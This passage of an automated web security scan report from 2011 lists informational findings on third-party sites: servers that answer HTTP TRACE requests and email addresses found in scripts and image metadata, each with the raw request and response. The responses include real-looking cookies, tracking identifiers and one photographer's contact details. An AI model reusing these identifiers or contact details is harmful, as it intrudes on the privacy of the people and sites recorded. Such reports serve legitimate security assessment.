Cookie: ee484a15c59a7212; obuid=34e83892-8848-4a54-a4d4-8bdbba750320; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; tick=1311108255000; _lvs2="O2ZXNI+sQ3qFHV61t3sdYQ=="; _lvd2="iYJQahqaNoybZPBlL1y+oQ=="; recs-ad82f50455df441759d1d8530ecd
...[SNIP]...

22.20. http://www.seapine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seapine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.seapine.com
Cookie: b36776f0b8ef85a0

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:49 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.seapine.com
Cookie: b36776f0b8ef85a0; SourceKey=201107191020391579


22.21. http://www.stumbleupon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: ee0154814b05613e

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 652
Date: Tue, 19 Jul 2011 14:28:26 GMT
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: ee0154814b05613e; su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=
...[SNIP]...

23. Email addresses disclosed  previous  next
There are 75 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


23.1. http://ads.msn.com/library/dapmsn.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.msn.com
Path:   /library/dapmsn.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dapmsn.js HTTP/1.1
Host: ads.msn.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MUID=E361C23374E642C998D8ABA7166A75EC; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; Sample=93; SRCHHPGUSR=AS=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Date: Tue, 19 Jul 2011 15:19:19 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Jun 2011 17:27:41 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3877

function verifyDapResize(a){var b=dapMgr.adCont;!b[a].resizeCalled&&dap_Resize(b[a].ifrmid,b[a].w,b[a].h)}function dap_Resize(a,c,b){document.getElementById(a).width=c;document.getElementById(a).heigh
...[SNIP]...

23.2. http://az10143.vo.msecnd.net/sitecore/dbing/media/Images/homepage/rr-partypeople.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://az10143.vo.msecnd.net
Path:   /sitecore/dbing/media/Images/homepage/rr-partypeople.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /sitecore/dbing/media/Images/homepage/rr-partypeople.jpg HTTP/1.1
Host: az10143.vo.msecnd.net
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a71be9da-385a-45ab-b672-9d67c538b004=%7B%22parent_id%22%3A%229uMSzSBW7pb%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22B5nUnLnLLMn%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%23fbid%3D9uMSzSBW7pb%26wom%3Dfalse%22%2C%22url_tag%22%3A%22NOMTAG%22%7D

Response

HTTP/1.1 200 OK
Content-Length: 14027
Content-Type: application/octet-stream
Content-MD5: DxfOPoOrBghkR6SVbhSKkQ==
ETag: 0x8CDF8F745899615
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 66dc813b-481f-4059-a5de-6ff0b5ddd5db
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Age: 10531
Date: Tue, 19 Jul 2011 15:17:00 GMT
Last-Modified: Tue, 14 Jun 2011 22:12:23 GMT
Connection: keep-alive

.....>Exif..II*.......................Copyright Lars Topelmann........Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns
...[SNIP]...
eny St" Iptc4xmpCore:CiAdrCity="Portland" Iptc4xmpCore:CiAdrRegion="Oregon" Iptc4xmpCore:CiAdrPcode="97214" Iptc4xmpCore:CiAdrCtry="USA" Iptc4xmpCore:CiTelWork="503 234 1963" Iptc4xmpCore:CiEmailWork="lars@larstopelmann.com" Iptc4xmpCore:CiUrlWork="http://larstopelmann.com"/>
...[SNIP]...

23.3. http://b3.mookie1.com/RealMedia/ads/Creatives/USNetwork/TRACK_MIG/mig_analytics.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/Creatives/USNetwork/TRACK_MIG/mig_analytics.js

Issue detail

The following email address was disclosed in the response:

Request

GET /RealMedia/ads/Creatives/USNetwork/TRACK_MIG/mig_analytics.js HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Mon, 24 May 2010 23:22:14 GMT
ETag: "7ba13a2-529a-4875f4f9a5580"
Accept-Ranges: bytes
Content-Length: 21146
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/;httponly

//begin OAS Analytics
var d=document;
var OAS_rdl = '';
var OAS_CA = 'N';
if((d.referrer)&&(d.referrer!="[unknown origin]"))
{
   if(d.referrer.indexOf("?") == -1)
   {
       OAS_rdl += '&tax
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

23.4. http://cache.boston.com/universal/js/bcom_hp_scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.boston.com
Path:   /universal/js/bcom_hp_scripts.js

Issue detail

The following email address was disclosed in the response:

Request

GET /universal/js/bcom_hp_scripts.js HTTP/1.1
Host: cache.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; RMFD=011QK73VO205zQN|O105zfl

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:23:40 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Content-Type: application/javascript
Warning: 110 cache.boston.com "Response is stale" "Fri, 08 Jul 2011 07:21:20 GMT"
Last-Modified: Thu, 23 Dec 2010 14:30:43 GMT
Accept-Ranges: bytes
Served-By: connor
Age: 1088
ETag: "488e32-440c-49814b6f49f11"
Cache-Control: max-age=3600
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Tue, 19 Jul 2011 21:23:39 GMT
Via: 1.1 rhv082184010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 17420

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @param
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

23.5. http://cache.boston.com/universal/js/twitterwidget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.boston.com
Path:   /universal/js/twitterwidget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /universal/js/twitterwidget.js?v2 HTTP/1.1
Host: cache.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:31:02 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Content-Type: application/javascript
Last-Modified: Wed, 22 Sep 2010 15:11:58 GMT
ETag: "3c5233-785c-490da91191fb8"
Accept-Ranges: bytes
Served-By: connor
Age: 765
Cache-Control: max-age=3591
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Tue, 19 Jul 2011 21:30:52 GMT
Via: 1.1 rhv082178010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 30812

function twitterCallback2(twitters) {
var statusHTML = [];
for (var i=0; i<twitters.length; i++){
var username = twitters[i].user.screen_name;
var status = twitters[i].text.replace(/((http
...[SNIP]...

return '1 day ago';
} else {
return (Math.round(delta / 86400)).toString() + ' days ago';
}
}
/**
* Twitter - http://www.twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
* V 2.2 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
*/
if(!"console" in window){window.console={log:function(){}}}TWTR=window.TWTR||{};if(!Array.forEach){Array.prototype.
...[SNIP]...

23.6. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-0.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The following email address was disclosed in the response:

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: x4M751vsyia6yn1nzPnEVNrA+AuEhwB/x/3QhkcN1YKXrgw+ug8pKiZAAv+/c1wK
x-amz-request-id: 5AF895301A577AFC
Date: Tue, 12 Jul 2011 17:56:27 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:01:24 GMT
ETag: "9c0ff6f4c105c41bbed5abe133356fb0"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 304460
Server: AmazonS3
Age: 607182
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: e428617553c7e348a8118ca0028b8a92716c6fc8d157255d9df41267c319e1b5270e7c2578badd16
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c===
...[SNIP]...
ainerDomId;this.bindListeners();}
EmailSubscription.prototype={bindListeners:function(){var self=this;$('form#'+self.formDomId).submit(function(event){var email=$('#'+self.emailDomId).val();if(email=='you@example.com'||!self.validateEmail(email)){$('#'+self.emailErrorDomId).show();}else{var postData={email:email,ch:fsTop.channel.name,ml_aid:self.mailingListAssetId};if(self.entityType){postData.et=self.entityType;}
...[SNIP]...

23.7. http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-0.fansnap.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The following email address was disclosed in the response:

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-0.fansnap.com

Response

HTTP/1.0 200 OK
x-amz-id-2: knN/dFBbGwn8rOtStOXf19nyA7reSbnijcldW4BwgpSixdeE6jIYJW6EnE18cZ+7
x-amz-request-id: 3CC91272AC0AEF46
Date: Tue, 12 Jul 2011 17:56:36 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:01:24 GMT
ETag: "9c0ff6f4c105c41bbed5abe133356fb0"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 304460
Server: AmazonS3
Age: 607350
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 60c48ca07357995587bd0a8d9fa5ec2d19ac1f4a2664876b1766455297d89640a3cb3bd852a2e9f0
Via: 1.0 8a8618213617600186ecf6bd4987d76d.cloudfront.net:11180 (CloudFront), 1.0 17f2340bce21dc578315ae9d02405a64.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c===
...[SNIP]...
ainerDomId;this.bindListeners();}
EmailSubscription.prototype={bindListeners:function(){var self=this;$('form#'+self.formDomId).submit(function(event){var email=$('#'+self.emailDomId).val();if(email=='you@example.com'||!self.validateEmail(email)){$('#'+self.emailErrorDomId).show();}else{var postData={email:email,ch:fsTop.channel.name,ml_aid:self.mailingListAssetId};if(self.entityType){postData.et=self.entityType;}
...[SNIP]...

23.8. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The following email address was disclosed in the response:

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: x4M751vsyia6yn1nzPnEVNrA+AuEhwB/x/3QhkcN1YKXrgw+ug8pKiZAAv+/c1wK
x-amz-request-id: 5AF895301A577AFC
Date: Tue, 12 Jul 2011 17:56:27 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:01:24 GMT
ETag: "9c0ff6f4c105c41bbed5abe133356fb0"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 304460
Server: AmazonS3
Age: 607036
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 92d669bfe0c1d28124cf2423ed4cb88b016eeed20e0321d2e6e24e78183c3749ba87dbb1c55cd7c8
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c===
...[SNIP]...
ainerDomId;this.bindListeners();}
EmailSubscription.prototype={bindListeners:function(){var self=this;$('form#'+self.formDomId).submit(function(event){var email=$('#'+self.emailDomId).val();if(email=='you@example.com'||!self.validateEmail(email)){$('#'+self.emailErrorDomId).show();}else{var postData={email:email,ch:fsTop.channel.name,ml_aid:self.mailingListAssetId};if(self.entityType){postData.et=self.entityType;}
...[SNIP]...

23.9. http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn-1.fansnap.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The following email address was disclosed in the response:

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-1.fansnap.com

Response

HTTP/1.0 200 OK
x-amz-id-2: 1lpYEuSfxof8FCN+lIIz603PkMKuJ9Fi/RGv6bpp3RADGgQATaMZNAEZchnTMSkK
x-amz-request-id: 3D01A8857C0A03FD
Date: Tue, 12 Jul 2011 17:58:56 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:01:24 GMT
ETag: "9c0ff6f4c105c41bbed5abe133356fb0"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 304460
Server: AmazonS3
Age: 607082
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: b3151678367e6c57a9a4193ab800cf4ee07a278868320d50d0600b96baffe78306fe254c5a73ecdf
Via: 1.0 9ddc02009e4fa67e3c52fc9fe8639037.cloudfront.net:11180 (CloudFront), 1.0 a02a758285c6952d9ec10f895b84b63a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c===
...[SNIP]...
ainerDomId;this.bindListeners();}
EmailSubscription.prototype={bindListeners:function(){var self=this;$('form#'+self.formDomId).submit(function(event){var email=$('#'+self.emailDomId).val();if(email=='you@example.com'||!self.validateEmail(email)){$('#'+self.emailErrorDomId).show();}else{var postData={email:email,ch:fsTop.channel.name,ml_aid:self.mailingListAssetId};if(self.entityType){postData.et=self.entityType;}
...[SNIP]...

23.10. http://feedburner.google.com/fb/feed-styles/bf30.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feedburner.google.com
Path:   /fb/feed-styles/bf30.js

Issue detail

The following email address was disclosed in the response:

Request

GET /fb/feed-styles/bf30.js HTTP/1.1
Host: feedburner.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/javascript
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Tue, 19 Jul 2011 15:41:16 GMT
Expires: Tue, 19 Jul 2011 15:41:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 12057
X-XSS-Protection: 1; mode=block

//GLOBALS
var userchoice
var anychoice
var savechoice
var jsFeedUrl = "...";
var jsFeedTitle = null;

// A workaround for XSL-to-XHTML systems that don't
// implement XSL 'disable-output-escaping="yes"'.
//
// sburke@cpan.org, Sean M. Burke.
// - I hereby release this JavaScript code into the public domain.

var is_decoding;
var DEBUG = 0;

function complaining (s) { alert(s); return s; }

if(!(document.getElementById))
...[SNIP]...

23.11. http://i2.onlinehelp.microsoft.com/Areas/Global/Content/Omniture/resources/OnlineHelp/omni_rsid_OnlineHelp.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i2.onlinehelp.microsoft.com
Path:   /Areas/Global/Content/Omniture/resources/OnlineHelp/omni_rsid_OnlineHelp.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Areas/Global/Content/Omniture/resources/OnlineHelp/omni_rsid_OnlineHelp.js HTTP/1.1
Host: i2.onlinehelp.microsoft.com
Proxy-Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=86400
Content-Type: application/javascript
Last-Modified: Mon, 06 Jun 2011 11:08:01 GMT
Accept-Ranges: bytes
ETag: "80a41103a24cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
ntCoent-Length: 70055
Content-Length: 70055
X-Serial: 1363
Vary: Accept-Encoding
X-Check-Cacheable: YES
Date: Tue, 19 Jul 2011 15:16:06 GMT
Connection: close

var _om_gbls={omniGuidPath:"",version:"1105",tmp:"",s_account:"",market:"",app:"",center:"",library:"",subdom:"",catpath:"",site:"",wtspparam:"",host:"",path:"",href:"",extraRsids:"",extraRsidsArr:"",
...[SNIP]...
